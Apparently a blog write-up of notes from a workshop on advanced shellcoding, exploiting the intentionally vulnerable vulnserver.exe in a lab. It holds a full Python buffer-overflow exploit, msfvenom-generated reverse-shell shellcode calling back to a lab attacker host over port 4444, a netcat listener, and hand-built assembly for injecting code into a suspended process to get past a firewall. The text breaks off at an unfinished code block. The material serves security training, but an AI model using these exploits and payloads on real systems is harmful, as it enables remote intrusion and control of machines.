Advanced Shellcoding Workshop
Today I attended an advanced shellcoding workshop organized by Div0 and taught by Arnold Anthony. Previously I had attended the basics of buffer overflow and custom shellcoding workshop taught by him but I had lost the notes, so this time I'm going to post my notes here so I won't lose them again.
A few minutes after the workshop started, the courier came knocking on my door and delivered the @WakeTheCrew espresso coffee concentrate (highly recommended!) that I had ordered 2 days ago. After enjoying a cup of cold brew coffee, I was ready to start hacking!
Arnold started by explaining the goal of this workshop. Sometimes during reconnaissance, we know that a server is running a vulnerable process, but it is protected by a firewall, so we cannot get a reverse or bind shell on a new port. In this workshop, he explained how to create shellcode that rebinds a socket to the same port the firewall already allows, so that we can connect to it.
In this workshop, we're using a Win7 VM which has ASLR disabled on purpose. In the real world we would generally need to bypass ASLR, but that is out of the scope of this workshop.
Here are the IP addresses of the VMs I'm using.
- Win7: 172.16.202.133
- Kali Linux: 172.16.202.130
Why and when is a rebind socket needed?
First, let's review a situation when a rebind shell is not needed.
In our PoC (proof of concept), a vulnerable server, vulnserver.exe, was started in the Win7 VM.
I started by port scanning the Win7 machine using nmap in Kali:
nmap -sS 172.16.202.133
Starting Nmap 7.80 ( https://nmap.org ) at 2021-06-12 10:17 +08
Nmap scan report for 172.16.202.133
Host is up (0.00056s latency).
Not shown: 988 filtered ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
554/tcp open rtsp
2869/tcp open icslap
5357/tcp open wsdapi
9999/tcp open abyss <------ vulnserver.exe
10243/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
MAC Address: 00:0C:29:73:49:4C (VMware)
Nmap done: 1 IP address (1 host up) scanned in 4.83 seconds
I can see a lot of services running. One of them is port 9999, served by our vulnserver.
Here I created a Windows reverse shell payload using msfvenom, which outputs the shellcode as Python code. A vulnerable process receiving this payload will connect to my Kali machine over port 4444.
msfvenom -a x86 -platform Windows -p windows/shell_reverse_tcp lhost=172.16.202.130 lport=4444 -e x86/shikata_ga_nai -b "\x00" -f python
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of python file: 1712 bytes
buf = b""
buf += b"\xda\xcb\xd9\x74\x24\xf4\x5d\xb8\xd8\xea\xce\x07\x33"
buf += b"\xc9\xb1\x52\x31\x45\x17\x03\x45\x17\x83\x1d\xee\x2c"
buf += b"\xf2\x61\x07\x32\xfd\x99\xd8\x53\x77\x7c\xe9\x53\xe3"
buf += b"\xf5\x5a\x64\x67\x5b\x57\x0f\x25\x4f\xec\x7d\xe2\x60"
buf += b"\x45\xcb\xd4\x4f\x56\x60\x24\xce\xd4\x7b\x79\x30\xe4"
buf += b"\xb3\x8c\x31\x21\xa9\x7d\x63\xfa\xa5\xd0\x93\x8f\xf0"
buf += b"\xe8\x18\xc3\x15\x69\xfd\x94\x14\x58\x50\xae\x4e\x7a"
buf += b"\x53\x63\xfb\x33\x4b\x60\xc6\x8a\xe0\x52\xbc\x0c\x20"
buf += b"\xab\x3d\xa2\x0d\x03\xcc\xba\x4a\xa4\x2f\xc9\xa2\xd6"
buf += b"\xd2\xca\x71\xa4\x08\x5e\x61\x0e\xda\xf8\x4d\xae\x0f"
buf += b"\x9e\x06\xbc\xe4\xd4\x40\xa1\xfb\x39\xfb\xdd\x70\xbc"
buf += b"\x2b\x54\xc2\x9b\xef\x3c\x90\x82\xb6\x98\x77\xba\xa8"
buf += b"\x42\x27\x1e\xa3\x6f\x3c\x13\xee\xe7\xf1\x1e\x10\xf8"
buf += b"\x9d\x29\x63\xca\x02\x82\xeb\x66\xca\x0c\xec\x89\xe1"
buf += b"\xe9\x62\x74\x0a\x0a\xab\xb3\x5e\x5a\xc3\x12\xdf\x31"
buf += b"\x13\x9a\x0a\x95\x43\x34\xe5\x56\x33\xf4\x55\x3f\x59"
buf += b"\xfb\x8a\x5f\x62\xd1\xa2\xca\x99\xb2\x60\x1a\x6b\xc0"
buf += b"\x11\x19\x6b\xd4\xbd\x94\x8d\xbc\x2d\xf1\x06\x29\xd7"
buf += b"\x58\xdc\xc8\x18\x77\x99\xcb\x93\x74\x5e\x85\x53\xf0"
buf += b"\x4c\x72\x94\x4f\x2e\xd5\xab\x65\x46\xb9\x3e\xe2\x96"
buf += b"\xb4\x22\xbd\xc1\x91\x95\xb4\x87\x0f\x8f\x6e\xb5\xcd"
buf += b"\x49\x48\x7d\x0a\xaa\x57\x7c\xdf\x96\x73\x6e\x19\x16"
buf += b"\x38\xda\xf5\x41\x96\xb4\xb3\x3b\x58\x6e\x6a\x97\x32"
buf += b"\xe6\xeb\xdb\x84\x70\xf4\x31\x73\x9c\x45\xec\xc2\xa3"
buf += b"\x6a\x78\xc3\xdc\x96\x18\x2c\x37\x13\x28\x67\x15\x32"
buf += b"\xa1\x2e\xcc\x06\xac\xd0\x3b\x44\xc9\x52\xc9\x35\x2e"
buf += b"\x4a\xb8\x30\x6a\xcc\x51\x49\xe3\xb9\x55\xfe\x04\xe8"
I pasted the generated payload into my Python script exp.py, where 0x625011af is the address of a "JMP ESP" instruction. Arnold said he won't explain how we get to this address since that's covered in the previous Buffer Overflow workshop.
#!/usr/bin/python
import socket
import sys
buf = b""
buf += b"\xda\xcb\xd9\x74\x24\xf4\x5d\xb8\xd8\xea\xce\x07\x33"
buf += b"\xc9\xb1\x52\x31\x45\x17\x03\x45\x17\x83\x1d\xee\x2c"
buf += b"\xf2\x61\x07\x32\xfd\x99\xd8\x53\x77\x7c\xe9\x53\xe3"
buf += b"\xf5\x5a\x64\x67\x5b\x57\x0f\x25\x4f\xec\x7d\xe2\x60"
buf += b"\x45\xcb\xd4\x4f\x56\x60\x24\xce\xd4\x7b\x79\x30\xe4"
buf += b"\xb3\x8c\x31\x21\xa9\x7d\x63\xfa\xa5\xd0\x93\x8f\xf0"
buf += b"\xe8\x18\xc3\x15\x69\xfd\x94\x14\x58\x50\xae\x4e\x7a"
buf += b"\x53\x63\xfb\x33\x4b\x60\xc6\x8a\xe0\x52\xbc\x0c\x20"
buf += b"\xab\x3d\xa2\x0d\x03\xcc\xba\x4a\xa4\x2f\xc9\xa2\xd6"
buf += b"\xd2\xca\x71\xa4\x08\x5e\x61\x0e\xda\xf8\x4d\xae\x0f"
buf += b"\x9e\x06\xbc\xe4\xd4\x40\xa1\xfb\x39\xfb\xdd\x70\xbc"
buf += b"\x2b\x54\xc2\x9b\xef\x3c\x90\x82\xb6\x98\x77\xba\xa8"
buf += b"\x42\x27\x1e\xa3\x6f\x3c\x13\xee\xe7\xf1\x1e\x10\xf8"
buf += b"\x9d\x29\x63\xca\x02\x82\xeb\x66\xca\x0c\xec\x89\xe1"
buf += b"\xe9\x62\x74\x0a\x0a\xab\xb3\x5e\x5a\xc3\x12\xdf\x31"
buf += b"\x13\x9a\x0a\x95\x43\x34\xe5\x56\x33\xf4\x55\x3f\x59"
buf += b"\xfb\x8a\x5f\x62\xd1\xa2\xca\x99\xb2\x60\x1a\x6b\xc0"
buf += b"\x11\x19\x6b\xd4\xbd\x94\x8d\xbc\x2d\xf1\x06\x29\xd7"
buf += b"\x58\xdc\xc8\x18\x77\x99\xcb\x93\x74\x5e\x85\x53\xf0"
buf += b"\x4c\x72\x94\x4f\x2e\xd5\xab\x65\x46\xb9\x3e\xe2\x96"
buf += b"\xb4\x22\xbd\xc1\x91\x95\xb4\x87\x0f\x8f\x6e\xb5\xcd"
buf += b"\x49\x48\x7d\x0a\xaa\x57\x7c\xdf\x96\x73\x6e\x19\x16"
buf += b"\x38\xda\xf5\x41\x96\xb4\xb3\x3b\x58\x6e\x6a\x97\x32"
buf += b"\xe6\xeb\xdb\x84\x70\xf4\x31\x73\x9c\x45\xec\xc2\xa3"
buf += b"\x6a\x78\xc3\xdc\x96\x18\x2c\x37\x13\x28\x67\x15\x32"
buf += b"\xa1\x2e\xcc\x06\xac\xd0\x3b\x44\xc9\x52\xc9\x35\x2e"
buf += b"\x4a\xb8\x30\x6a\xcc\x51\x49\xe3\xb9\x55\xfe\x04\xe8"
# 0x625011af (JMP ESP) in little-endian order. Every piece is a bytes literal so it concatenates with buf.
shellcode = b"A" * 2003 + b"\xaf\x11\x50\x62" + b"\x90" * 10 + buf + b"C" * (3000 - len(buf) - 4 - 2003 - 10)
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('172.16.202.133', 9999))
    s.send(b'TRUN /.:/' + shellcode)
    print("Fuzzing with TRUN command with %s bytes" % len(shellcode))
    s.close()
except socket.error:
    print("Error connecting to server")
    sys.exit()
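To make the layout of the overflow buffer easier to see, here is a minimal sketch (Python 3 assumed) that only computes where each section starts. The numbers come from the script above; the `layout` helper and the section names are my own illustration and nothing is sent over the network.

```python
import struct

# Values taken from the script above; the names are illustrative.
OFFSET = 2003          # filler bytes before the saved return address
JMP_ESP = 0x625011AF   # address of the JMP ESP instruction
NOP_SLED = 10          # NOPs placed before the payload
TOTAL = 3000           # overall length the script pads to

def layout(payload_len):
    """Return (section, start, length) tuples for the overflow buffer."""
    sections = [
        ("filler 'A'", OFFSET),
        ("return address", 4),
        ("NOP sled", NOP_SLED),
        ("payload", payload_len),
        ("padding 'C'", TOTAL - payload_len - 4 - OFFSET - NOP_SLED),
    ]
    result, pos = [], 0
    for name, length in sections:
        result.append((name, pos, length))
        pos += length
    return result

# x86 stores addresses little-endian, hence the reversed byte order in the script.
ret = struct.pack("<I", JMP_ESP)

for name, start, length in layout(351):   # 351 = size reported by msfvenom
    print("%-15s start=%4d len=%4d" % (name, start, length))
```

The return address lands at offset 2003, and the padding keeps the total at 3000 bytes regardless of the payload size.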
So I started a netcat listener in a new console tab in Kali:
nc -lvp 4444
Then I ran the exploit script:
python exp.py
When I checked netcat, I could see that a Windows command prompt was displayed.
This means the Python script successfully connected to my Win7 machine over port 9999, then the shellcode created a reverse shell from a random local port, which called back to the netcat listener on my Kali machine over port 4444:
C:\Users\test\Desktop>netstat -ano | findstr 4444
netstat -ano | findstr 4444
TCP 172.16.202.133:49175 172.16.202.130:4444 ESTABLISHED 2212
Now imagine there is a firewall that blocks connections on custom ports like 4444. In that case, there is no way to get the reverse shell to work.
To simulate this scenario, I disabled all inbound rules in "Windows Firewall" that allowed external connections to this machine. Then I created a new rule which only allows inbound connections to port 9999.
- Inbound Rules > Select all > Disable rule
- Action > New Rule > Port > Specify TCP port 9999 > Allow the connection > Next > Give a name > Finish
Next, I configured the firewall to block all outbound connections from this Win7 VM:
- Right click on "Windows Firewall with Advanced Security" > Properties > Domain Profile/Private Profile/Public Profile > Outbound connections > Block > OK
Now when I do a port scan, I can confirm the only exposed port on Win7 is port 9999. In the real world, if we see only one or two ports exposed, there's probably a firewall involved.
nmap 172.16.202.133
Starting Nmap 7.80 ( https://nmap.org ) at 2021-06-12 11:03 +08
Nmap scan report for 172.16.202.133
Host is up (0.00038s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE
9999/tcp open abyss
MAC Address: 00:0C:29:73:49:4C (VMware)
Nmap done: 1 IP address (1 host up) scanned in 15.88 seconds
If I re-run netcat and the Python script, this time I do not get a shell. Even though the script was able to connect to port 9999 and exploit the server, the firewall blocked the outbound connection to my Kali machine.
So the goal of this workshop is to figure out how we can get a shell even in this situation.
How does a Rebind Socket work?
Overview:
- Create a suspended cmd.exe process via shellcode.
- In the cmd.exe process, allocate a memory space.
- Write a shellcode inside this allocated memory.
- Using the primary thread in the cmd.exe process, get the EIP register value.
- Change the EIP register value to the allocated memory address.
- Now that EIP points to the allocated memory, resume the thread to execute the bind shell.
- Terminate the vulnserver.exe process.
In the rest of the post, I will explain step by step how to do this.
Step 1 - Create a process
Open vulnserver.exe in Immunity Debugger.
Click the play button to run the application.
In the bottom input field, type bp 0x625011af to create a breakpoint at the memory address defined in the Python script.
Click the "b" button in Immunity Debugger to check that the breakpoint is in place, then click "c" to come back to the main window.
Then I removed the previous shellcode from the Python script and ran the script.
I can see that execution stopped at the breakpoint (JMP ESP).
Then I step over the code using F8, or by clicking the down arrow icon (third button after the Play button).
Here is where I will create a new process using the Windows API CreateProcessA.
According to MSDN, these are the arguments needed to call CreateProcessA:
BOOL CreateProcessA(
LPCSTR lpApplicationName,
LPSTR lpCommandLine,
LPSECURITY_ATTRIBUTES lpProcessAttributes,
LPSECURITY_ATTRIBUTES lpThreadAttributes,
BOOL bInheritHandles,
DWORD dwCreationFlags,
LPVOID lpEnvironment,
LPCSTR lpCurrentDirectory,
LPSTARTUPINFOA lpStartupInfo,
LPPROCESS_INFORMATION lpProcessInformation
);
Out of all these arguments, I will leave most of them null. Only 4 arguments are important:
- lpCommandLine: a string with the command we want to run, in this case "cmd".
- dwCreationFlags: flags that create a suspended process with no window shown.
- lpStartupInfo: points to a structure with 18 fields describing the window, which should all be null because we want the process hidden at all times.
- lpProcessInformation: points to the most important structure, which receives the handles of the new process. In this structure, hProcess and hThread are the handles we want, depending on whether we want to control the process or its thread.
Now, I will start creating the arguments.
Use any "ASCII to Hex" online tool to convert "cmd" string to hex:
63 6d 64
The string has to be terminated by adding 0x00 (null byte) at the end.
63 6d 64 00
When putting the values in the stack, it has to be in reverse order:
00 64 6d 63
However, a zero byte is considered a bad character in shellcode, so we have to make sure it doesn't show up in the instructions.
In Immunity Debugger, press spacebar on a NOP, or double click it, to start assembling instructions.
There are many ways to avoid bad characters in the shellcode. One method is to load a value that contains no 00 byte, then add to or subtract from it.
In this example I'm using the general purpose register EDX.
MOV EDX,10747d73
Then we will subtract 10101010 from EDX:
SUB EDX,10101010
The value stored in the EDX register ends up as 0x00646d63 (the bytes of "cmd" plus the null terminator, as a little-endian DWORD). Push it to the stack:
PUSH EDX
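The arithmetic behind this trick can be checked offline. The following is a minimal sketch (Python 3 assumed) that derives the start value from the target DWORD and confirms that neither operand contains a null byte. The helper names `has_bad_bytes` and `split_for_sub` are hypothetical, chosen only for this illustration.

```python
import struct

BAD = b"\x00"  # bad characters for this exercise

def has_bad_bytes(value, bad=BAD):
    """True if the little-endian DWORD encoding of value contains a bad byte."""
    return any(byte in bad for byte in struct.pack("<I", value))

def split_for_sub(target, subtrahend=0x10101010):
    """Return (start, subtrahend) such that start - subtrahend == target (mod 2**32)."""
    start = (target + subtrahend) & 0xFFFFFFFF
    return start, subtrahend

# "cmd" plus its null terminator, read as a little-endian DWORD.
target = struct.unpack("<I", b"cmd\x00")[0]
start, sub = split_for_sub(target)

print(hex(target), hex(start), hex(sub))
print(has_bad_bytes(target), has_bad_bytes(start), has_bad_bytes(sub))
```

The target itself contains a null byte, while both the value loaded by MOV and the value subtracted by SUB are null-free, which is the whole point of splitting it.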
If I step over, I can see the stack address that stores the "cmd" string in the bottom right pane of Immunity Debugger.
Next I will copy that address from ESP into another general purpose register such as EBX. This will be used later as the value for lpCommandLine.
MOV EBX,ESP
I can create values for the other arguments on the fly, but let's focus on the lpStartupInfo structure next.
Since its fields are all null, I'll use XOR to create a zero value and keep it in a general purpose register such as ECX:
XOR ECX,ECX
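The bytes shown on the left side ("33 C9") are the machine code for this instruction. They contain no null byte even though the result is zero.
I will push this 17 times to fill the lpStartupInfo structure: its 18 fields occupy 68 bytes on 32-bit Windows, which is 17 DWORDs.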
PUSH ECX
Next I will save the stack address that points to this lpStartupInfo structure into another register, such as ESI.
MOV ESI,ESP
The value stored in ESI is a memory address that points to lpStartupInfo, for example something like 0x0194F998.
lpProcessInformation is another structure needed by CreateProcessA. Though we can use any writable memory address for it, I'll give it a 4-byte offset from 0x0194F998, which is 0x0194F99C.
I'll assign this memory address to EDI:
MOV EDI,ESI
ADD EDI,4
So far:
- ESI contains the memory address of lpStartupInfo
- EDI contains the memory address of lpProcessInformation
Push both to the stack:
PUSH EDI
PUSH ESI
The next two arguments in the CreateProcessA call are null:
BOOL CreateProcessA(
LPCSTR lpApplicationName, # null
LPSTR lpCommandLine, # string "cmd" that's stored in EBX
LPSECURITY_ATTRIBUTES lpProcessAttributes, # null
LPSECURITY_ATTRIBUTES lpThreadAttributes, # null
BOOL bInheritHandles, # null (FALSE)
DWORD dwCreationFlags, # value 0x08000004, built in ECX
LPVOID lpEnvironment, # null
LPCSTR lpCurrentDirectory, # null
LPSTARTUPINFOA lpStartupInfo, # memory address stored in ESI
LPPROCESS_INFORMATION lpProcessInformation # memory address stored in EDI
);
So we push ECX which contains zero value two times:
PUSH ECX
PUSH ECX
Then for dwCreationFlags we need to create the value 0x08000004.
Why this value, you ask? Refer to the Process Creation Flags section in MSDN. This is the sum of two flags that I want the process to be created with:
- 0x00000004: suspended process (CREATE_SUSPENDED)
- 0x08000000: no window (CREATE_NO_WINDOW)
0x08000004 contains bad characters because two of its four bytes are null.
ECX currently holds zero, so I will reuse it for this operation.
Here I load a value that does not contain bad characters, then subtract accordingly to get the value that we want:
MOV ECX,9010105
SUB ECX,1010101
PUSH ECX
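As a sanity check on the flag value, here is a small sketch (Python 3 assumed). The two constants are the values documented for Process Creation Flags; the `le_bytes` helper is just for this illustration.

```python
# Values from the Process Creation Flags documentation.
CREATE_SUSPENDED = 0x00000004
CREATE_NO_WINDOW = 0x08000000

flags = CREATE_SUSPENDED | CREATE_NO_WINDOW

# Operands used by the MOV / SUB pair in the notes.
loaded, subtracted = 0x09010105, 0x01010101

def le_bytes(value):
    """Little-endian byte encoding of a DWORD, as it would appear in the instruction."""
    return value.to_bytes(4, "little")

print(hex(flags), le_bytes(flags).hex())
print(le_bytes(loaded).hex(), le_bytes(subtracted).hex())
```

The combined flag encodes to bytes with two nulls in the middle, while both operands of the MOV/SUB pair are null-free and their difference is exactly the flag value.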
Finally I push 3 nulls for the next 3 arguments.
XOR ECX,ECX
PUSH ECX
PUSH ECX
PUSH ECX
Then push the last 2 values to complete the argument list: lpCommandLine (the address in EBX) and a null lpApplicationName.
PUSH EBX
PUSH ECX
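Because the arguments are pushed from last to first, it is easy to lose track of the order. The sketch below (Python 3 assumed) lists the parameters in declaration order with the value these notes use for each one, then reverses the list to get the push order. It is only a bookkeeping aid, and the string labels are my own shorthand.

```python
# CreateProcessA parameters in declaration order, with the value used in these notes.
params = [
    ("lpApplicationName",    "0"),
    ("lpCommandLine",        "EBX"),         # address of the "cmd" string
    ("lpProcessAttributes",  "0"),
    ("lpThreadAttributes",   "0"),
    ("bInheritHandles",      "0"),
    ("dwCreationFlags",      "0x08000004"),  # suspended + no window
    ("lpEnvironment",        "0"),
    ("lpCurrentDirectory",   "0"),
    ("lpStartupInfo",        "ESI"),
    ("lpProcessInformation", "EDI"),
]

# The last parameter is pushed first, so the first one ends up on top of the stack.
push_order = list(reversed(params))

for name, value in push_order:
    print("PUSH %-12s ; %s" % (value, name))
```

The printed sequence matches the pushes above: EDI, ESI, two nulls, the flags, three nulls, EBX, and a final null.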
MSDN describes that the CreateProcessA API is implemented in kernel32.dll. I can get the specific address of the API using tools like Arwin.
C:\Users\test\Desktop>arwin kernel32.dll CreateProcessA
arwin - win32 address resolution program - by steve hanna - v.01
CreateProcessA is located at 0x77de2082 in kernel32.dll
Now that we know the CreateProcessA API lives at memory address 0x77DE2082, I can call this address directly and it will use the arguments prepared on the stack.
CALL 77DE2082
Or call it like this. Note that the API name is case sensitive:
CALL kernel32.CreateProcessA
But I prefer to store the memory address of the API in a register before calling it:
MOV EBX,kernel32.CreateProcessA
CALL EBX
The LastErr ERROR_SUCCESS shown in the debugger means that the API call was successful.
But how do I check that the process was created, given that we configured it to stay hidden without opening any window?
I used Process Hacker to see that a new cmd.exe process was created under vulnserver.exe. Right clicking the cmd.exe process, I can see an option called "Resume". This implies that the process was created in suspended mode, just as intended.
Step 2 - Allocate memory space to the process
The stack now holds the process information structure:
typedef struct _PROCESS_INFORMATION {
HANDLE hProcess; # 70
HANDLE hThread;
DWORD dwProcessId;
DWORD dwThreadId;
} PROCESS_INFORMATION, *PPROCESS_INFORMATION, *LPPROCESS_INFORMATION;
In the stack, we can see that the memory address 0x0174F99C contains the value 00000070, populated by CreateProcessA. This is the value of hProcess, in other words the process handle, or remote control, of the cmd.exe process.
The next step is to allocate memory in that process using the VirtualAllocEx API.
This is the structure of the API arguments:
LPVOID VirtualAllocEx(
HANDLE hProcess, # 70
LPVOID lpAddress, # null
SIZE_T dwSize, # 01F4
DWORD flAllocationType, # 3000
DWORD flProtect # 40
);
Here's how I get the values for them:
- dwSize: around 500 bytes of memory is needed, and decimal 500 is 0x01F4 in hex.
- flAllocationType: 0x3000. This is the sum of the following:
  - MEM_COMMIT: 0x00001000
  - MEM_RESERVE: 0x00002000
- flProtect: we want the memory to be executable, readable, and writable.
  - PAGE_EXECUTE_READWRITE: 0x40
I pop the stack twice to get to the hProcess value 0x70 and load it into ESI.
POP ESI
POP ESI
Next, pop the following value from the stack, the hThread handle, into EDI.
POP EDI
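The three pops are easier to follow with a toy model of the stack. This sketch (Python 3 assumed) treats the stack as a list whose first element is the top. It assumes ESP is back at the start of the zeroed lpStartupInfo block once CreateProcessA has removed its own arguments, and that lpProcessInformation sits 4 bytes above it, as set up earlier. Only 0x70 comes from the debugger; the other handle and ID values are made up.

```python
# Simulated stack after CreateProcessA returns. Index 0 is the top (ESP).
stack = [
    0x00000000,  # first DWORD of the zeroed lpStartupInfo block
    0x00000070,  # PROCESS_INFORMATION.hProcess (value seen in the debugger)
    0x00000074,  # PROCESS_INFORMATION.hThread (hypothetical value)
    0x00000A48,  # dwProcessId (hypothetical value)
    0x00000B10,  # dwThreadId (hypothetical value)
]

def pop(stack):
    """Model x86 POP: return the DWORD at the top and advance past it."""
    return stack.pop(0)

esi = pop(stack)  # POP ESI: discards the lpStartupInfo DWORD
esi = pop(stack)  # POP ESI: ESI now holds hProcess
edi = pop(stack)  # POP EDI: EDI now holds hThread

print(hex(esi), hex(edi))
```

After these pops, ESI carries the process handle for VirtualAllocEx and WriteProcessMemory, and EDI carries the thread handle for the thread context calls later on.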
Now I will start to construct the arguments for VirtualAllocEx, pushing them in reverse order. The first value pushed is flProtect (0x40), which is fine to push as is:
PUSH 40
The next value is flAllocationType (0x3000), but this can't be pushed directly because the 32-bit immediate contains null bytes. So I'll build it in ECX first:
XOR ECX,ECX
MOV CH,30
PUSH ECX
The third value is dwSize, which is 0x01F4 (500 bytes):
MOV CH,1
MOV CL,0F4
PUSH ECX
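Writing to the 8-bit halves CH and CL is what keeps these instructions free of null bytes. Below is a minimal sketch (Python 3 assumed) that models those partial register writes on a 32-bit value. The `set_ch` and `set_cl` helpers are hypothetical names for this illustration.

```python
def set_cl(ecx, value):
    """Model MOV CL,imm8: replace bits 0-7 of ECX."""
    return (ecx & 0xFFFFFF00) | (value & 0xFF)

def set_ch(ecx, value):
    """Model MOV CH,imm8: replace bits 8-15 of ECX."""
    return (ecx & 0xFFFF00FF) | ((value & 0xFF) << 8)

MEM_COMMIT, MEM_RESERVE = 0x00001000, 0x00002000

ecx = 0                      # XOR ECX,ECX
ecx = set_ch(ecx, 0x30)      # MOV CH,30
alloc_type = ecx             # 0x3000 = MEM_COMMIT | MEM_RESERVE

ecx = set_ch(ecx, 0x01)      # MOV CH,1
ecx = set_cl(ecx, 0xF4)      # MOV CL,0F4
size = ecx                   # 0x01F4 = 500 bytes

print(hex(alloc_type), hex(size), size)
```

Note that CH still holds 0x30 from the previous step, which is why the notes overwrite it with 1 before setting CL.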
Next argument is null:
XOR ECX,ECX
PUSH ECX
The last value to push, hProcess, is already stored in the ESI register, so I'll push it onto the stack:
PUSH ESI
Finally I will call the API:
MOV EBX,kernel32.VirtualAllocEx
CALL EBX
The call returns the address of the allocated memory in the EAX register.
How do we know that memory was allocated to the process?
I can attach a debugger to the process. In this case I'm using Windbg:
- File > Attach to Process > select cmd.exe
To attach to the correct process, I make sure there are no other cmd.exe windows open, although the process ID can also be easily identified in Process Hacker.
The Windbg Memory window shows the allocated memory address, which is 160000 here. This shows that the memory was successfully allocated in the process.
I'll save the start of the allocated memory somewhere, like in the EBP register.
MOV EBP,EAX
Step 3 - Move the bind shellcode into allocated memory.
The final payload will be a bind shellcode, but I'll pop calculator as a PoC for now.
Let's generate the shellcode using msfvenom and add it to the Python script:
msfvenom -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f c
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 220 (iteration=0)
x86/shikata_ga_nai chosen with final size 220
Payload size: 220 bytes
Final size of c file: 949 bytes
unsigned char buf[] =
"\xda\xd7\xba\x48\x02\x1f\x0f\xd9\x74\x24\xf4\x5f\x2b\xc9\xb1"
"\x31\x83\xc7\x04\x31\x57\x14\x03\x57\x5c\xe0\xea\xf3\xb4\x66"
"\x14\x0c\x44\x07\x9c\xe9\x75\x07\xfa\x7a\x25\xb7\x88\x2f\xc9"
"\x3c\xdc\xdb\x5a\x30\xc9\xec\xeb\xff\x2f\xc2\xec\xac\x0c\x45"
"\x6e\xaf\x40\xa5\x4f\x60\x95\xa4\x88\x9d\x54\xf4\x41\xe9\xcb"
"\xe9\xe6\xa7\xd7\x82\xb4\x26\x50\x76\x0c\x48\x71\x29\x07\x13"
"\x51\xcb\xc4\x2f\xd8\xd3\x09\x15\x92\x68\xf9\xe1\x25\xb9\x30"
"\x09\x89\x84\xfd\xf8\xd3\xc1\x39\xe3\xa1\x3b\x3a\x9e\xb1\xff"
"\x41\x44\x37\xe4\xe1\x0f\xef\xc0\x10\xc3\x76\x82\x1e\xa8\xfd"
"\xcc\x02\x2f\xd1\x66\x3e\xa4\xd4\xa8\xb7\xfe\xf2\x6c\x9c\xa5"
"\x9b\x35\x78\x0b\xa3\x26\x23\xf4\x01\x2c\xc9\xe1\x3b\x6f\x87"
"\xf4\xce\x15\xe5\xf7\xd0\x15\x59\x90\xe1\x9e\x36\xe7\xfd\x74"
"\x73\x17\xb4\xd5\xd5\xb0\x11\x8c\x64\xdd\xa1\x7a\xaa\xd8\x21"
"\x8f\x52\x1f\x39\xfa\x57\x5b\xfd\x16\x25\xf4\x68\x19\x9a\xf5"
"\xb8\x7a\x7d\x66\x20\x53\x18\x0e\xc3\xab";
I'll add some NOPs (no operation) to partition the rebind shellcode payload from the generated shellcode (our PoC that pops calc) to avoid risking them overwriting each other.
calc_shell=("\xda\xd7\xba\x48\x02\x1f\x0f\xd9\x74\x24\xf4\x5f\x2b\xc9\xb1"
"\x31\x83\xc7\x04\x31\x57\x14\x03\x57\x5c\xe0\xea\xf3\xb4\x66"
"\x14\x0c\x44\x07\x9c\xe9\x75\x07\xfa\x7a\x25\xb7\x88\x2f\xc9"
"\x3c\xdc\xdb\x5a\x30\xc9\xec\xeb\xff\x2f\xc2\xec\xac\x0c\x45"
"\x6e\xaf\x40\xa5\x4f\x60\x95\xa4\x88\x9d\x54\xf4\x41\xe9\xcb"
"\xe9\xe6\xa7\xd7\x82\xb4\x26\x50\x76\x0c\x48\x71\x29\x07\x13"
"\x51\xcb\xc4\x2f\xd8\xd3\x09\x15\x92\x68\xf9\xe1\x25\xb9\x30"
"\x09\x89\x84\xfd\xf8\xd3\xc1\x39\xe3\xa1\x3b\x3a\x9e\xb1\xff"
"\x41\x44\x37\xe4\xe1\x0f\xef\xc0\x10\xc3\x76\x82\x1e\xa8\xfd"
"\xcc\x02\x2f\xd1\x66\x3e\xa4\xd4\xa8\xb7\xfe\xf2\x6c\x9c\xa5"
"\x9b\x35\x78\x0b\xa3\x26\x23\xf4\x01\x2c\xc9\xe1\x3b\x6f\x87"
"\xf4\xce\x15\xe5\xf7\xd0\x15\x59\x90\xe1\x9e\x36\xe7\xfd\x74"
"\x73\x17\xb4\xd5\xd5\xb0\x11\x8c\x64\xdd\xa1\x7a\xaa\xd8\x21"
"\x8f\x52\x1f\x39\xfa\x57\x5b\xfd\x16\x25\xf4\x68\x19\x9a\xf5"
"\xb8\x7a\x7d\x66\x20\x53\x18\x0e\xc3\xab")
shellcode = "A" * 2003 + "\xaf\x11\x50\x62" + "\x90"*10 + payload + "C"*(2500-len(payload)-4-2003-10) + "\x90"*100 + calc_shell
To write this shellcode into the allocated memory, the WriteProcessMemory API will be used here.
BOOL WriteProcessMemory(
HANDLE hProcess,
LPVOID lpBaseAddress,
LPCVOID lpBuffer, # the address we want to start copying from stack. Choose from NOP area.
SIZE_T nSize, # 500 bytes (0x01F4)
SIZE_T *lpNumberOfBytesWritten # null
);
WriteProcessMemory accepts 5 arguments. Listed in the order they are pushed (last to first):
- lpNumberOfBytesWritten: null.
- nSize: how many bytes of memory we're going to write (500 bytes).
- lpBuffer: the address we start copying from.
- lpBaseAddress: the start of the memory allocated by VirtualAllocEx.
- hProcess: the process handle.
For the last argument, give it a null value:
XOR EBX,EBX
PUSH EBX
The next value, nSize, is 500 (0x01F4):
MOV BH,1
MOV BL,0F4
PUSH EBX
Next is lpBuffer.
Since we're copying the PoC shellcode from the stack into the allocated memory, pick a source address slightly before the shellcode to be safe. Ideally this should be a few bytes earlier, within the NOP sled.
How to measure the distance?
The generated msfvenom payload starts with "DA D7". Check where this resides in the stack; for example, the value BAD7DA90 is stored at the address 017BFC30. Double click that address, then scroll up to see how far it is from the top of the stack. The top of the stack, where the ESP register points, is memory address 017BF99C and contains the value 01F4. The debugger shows that the distance (offset) between the selected address and the top of the stack is 0x274.
MOV EBX,ESP
ADD BX,274
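To see where that offset actually lands, here is a small sketch (Python 3 assumed) using the addresses from this debugging session. It models ADD BX,274 as a 16-bit addition and checks that the resulting source address falls inside the 100-byte NOP sled just before the payload. The variable names are my own, and the addresses will differ on another run.

```python
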